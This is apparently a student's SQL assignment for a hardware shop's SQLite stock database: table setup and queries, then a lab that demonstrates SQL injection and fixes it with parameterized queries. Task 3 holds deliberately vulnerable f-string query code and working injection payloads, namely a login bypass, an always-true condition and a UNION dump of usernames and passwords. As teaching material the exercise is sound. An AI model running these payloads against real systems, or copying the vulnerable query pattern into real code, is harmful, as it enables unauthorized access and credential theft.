DANIELLA B. NAGGINDA 21/04/2026
# setup.py
import sqlite3
conn = sqlite3.connect('nyondo_stock.db')
conn.execute('''
CREATE TABLE IF NOT EXISTS products (
id INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT NOT NULL,
description TEXT,
price REAL NOT NULL
)
''')
conn.executemany(
'INSERT INTO products (name, description, price) VALUES (?, ?, ?)',
[
('Cement (bag)', 'Portland cement 50kg bag', 35000),
('Iron Sheet 3m','Gauge 30 roofing sheet 3m long', 110000),
('Paint 5L', 'Exterior wall paint white 5L', 60000),

('Nails 1kg', 'Common wire nails 1kg pack', 12000),
('Timber 2x4', 'Pine timber plank 2x4 per metre', 25000),
]
)
conn.commit()
rows = conn.execute('SELECT * FROM products').fetchall()
for r in rows: print(r)

this is the Create Table Statement
CREATE TABLE IF NOT EXISTS products (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    name TEXT NOT NULL,
    description TEXT,
    price REAL NOT NULL
)

this is the Insert Statement
INSERT INTO products (name, description, price) VALUES (?, ?, ?)

output
(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0)
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)
(4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0)
(5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)

screenshots/task1.png 

TASK 2

import sqlite3

conn = sqlite3.connect('nyondo_stock.db')
cursor = conn.cursor()

print("\n--- Query A: All products ---")
rows = cursor.execute('SELECT * FROM products').fetchall()
for r in rows:
    print(r)

print("\n--- Query B: Name and price ---")
rows = cursor.execute('SELECT name, price FROM products').fetchall()
for r in rows:
    print(r)

print("\n--- Query C: Product with id = 3 ---")
rows = cursor.execute('SELECT * FROM products WHERE id = 3').fetchall()
for r in rows:
    print(r)

print("\n--- Query D: Name contains 'sheet' ---")
rows = cursor.execute("SELECT * FROM products WHERE name LIKE '%sheet%'").fetchall()
for r in rows:
    print(r)

print("\n--- Query E: Sorted by price (highest first) ---")
rows = cursor.execute('SELECT * FROM products ORDER BY price DESC').fetchall()
for r in rows:
    print(r)

print("\n--- Query F: Top 2 most expensive ---")
rows = cursor.execute('SELECT * FROM products ORDER BY price DESC LIMIT 2').fetchall()
for r in rows:
    print(r)

print("\n--- Query G: Update Cement price ---")
cursor.execute('UPDATE products SET price = 38000 WHERE id = 1')
conn.commit()

rows = cursor.execute('SELECT * FROM products').fetchall()
for r in rows:
    print(r)

conn.close()

OUTPUT
Query A SELECT * FROM products;
--- Query A: All products ---
(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0)
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)
(4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0)
(5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)

Query B
--- Query B: Name and price ---
('Cement (bag)', 35000.0)
('Iron Sheet 3m', 110000.0)
('Paint 5L', 60000.0)
('Nails 1kg', 12000.0)
('Timber 2x4', 25000.0)

Query C
--- Query C: Product with id = 3 ---
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)

Query D
--- Query D: Name contains 'sheet' ---
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)

Query E 
--- Query E: Sorted by price (highest first) ---
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)
(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0)
(5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)
(4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0)

Query F 
--- Query F: Top 2 most expensive ---
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)

Query G 
--- Query G: Update Cement price ---
(1, 'Cement (bag)', 'Portland cement 50kg bag', 38000.0)
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)
(4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0)
(5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)

screenshots/task2.png

TASK 3

import sqlite3

conn = sqlite3.connect('nyondo_stock.db')

def search_product(name):
    query = f"SELECT * FROM products WHERE name LIKE '%{name}%'"
    print(f"\nQuery: {query}")
    rows = conn.execute(query).fetchall()
    print(f"Result: {rows}\n")
    return rows

def login(username, password):
    query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    print(f"\nQuery: {query}")
    row = conn.execute(query).fetchone()
    print(f"Result: {row}\n")
    return row

print("=== Attack 1: Dump all products ===")
search_product("' OR 1=1--")

print("=== Attack 2: Login bypass ===")
login("admin'--", "anything")

print("=== Attack 3: Always true login ===")
login("' OR '1'='1", "' OR '1'='1")

print("=== Attack 4: UNION attack ===")
search_product("' UNION SELECT id, username, password, role FROM users--")

conn.close() 

ATTACK 1
Query: 
SELECT * FROM products WHERE name LIKE '%' OR 1=1--%'


Result:
 [(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0), (2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0), 
 (3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0), (4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0), 
 (5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)]

Explanation: 
OR 1=1 is always true, so WHERE condition is bypassed and all products are returned.

ATTACK 2
Query:
SELECT * FROM users WHERE username='admin'--' AND password='anything'

Result:
(1, 'admin', 'admin123', 'admin')

Explanation:
-- comments out the password check, allowing login without a valid password.

ATTACK 3
Query:
SELECT * FROM users WHERE username='' OR '1'='1' AND password='' OR '1'='1

Result:
 (1, 'admin', 'admin123', 'admin')

Explanation:
'1'='1' is always true, so the login condition always succeeds.

ATTACK 4
Query:
SELECT * FROM products WHERE name LIKE '%' UNION SELECT id, username, password, role FROM users--%'

Result:
[(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0), (1, 'admin', 'admin123', 'admin'), 
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0), (2, 'fatuma', 'pass456', 'attendant'), 
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0), (3, 'wasswa', 'pass789', 'manager'), 
(4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0), (5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)]

Explanation:
UNION operator merges results from another table, exposing sensitive user data including passwords.

screenshots/task3_attack1.png 
screenshots/task3_attack2.png
screenshots/task3_attack3.png
screenshots/task3_attack4.png

TASK 4

import sqlite3

conn = sqlite3.connect('nyondo_stock.db')

# ✅ SAFE search using parameterized query
def search_product_safe(name):
    query = "SELECT * FROM products WHERE name LIKE ?"
    param = f"%{name}%"
    rows = conn.execute(query, (param,)).fetchall()
    return rows

# ✅ SAFE login using parameterized query
def login_safe(username, password):
    query = "SELECT * FROM users WHERE username=? AND password=?"
    row = conn.execute(query, (username, password)).fetchone()
    return row

# Tests (should all FAIL safely)
print('Test 1:', search_product_safe("' OR 1=1--"))
print('Test 2:', search_product_safe("' UNION SELECT id,username,password,role FROM users--"))
print('Test 3:', login_safe("admin'--", 'anything'))
print('Test 4:', login_safe("' OR '1'='1", "' OR '1'='1"))

conn.close()

Test 1: []
Test 2: []
Test 3: None
Test 4: None

Explanation
When we use f-strings, we directly insert what the user types into the SQL query.
 This is dangerous because the database cannot tell the difference between normal input and malicious code, 
 so it runs everything as part of the query. That is why attacks like ' OR 1=1-- can trick the system and return all data or bypass login.
When we use ? placeholders, the database treats the user input as data only, not as part of the SQL command.
 This means even if someone types malicious input, it will not be executed as SQL code. Instead, it is handled safely like normal text.
Because of this, parameterized queries protect the system from SQL injection and keep the database secure.SS

screenshots/task4.png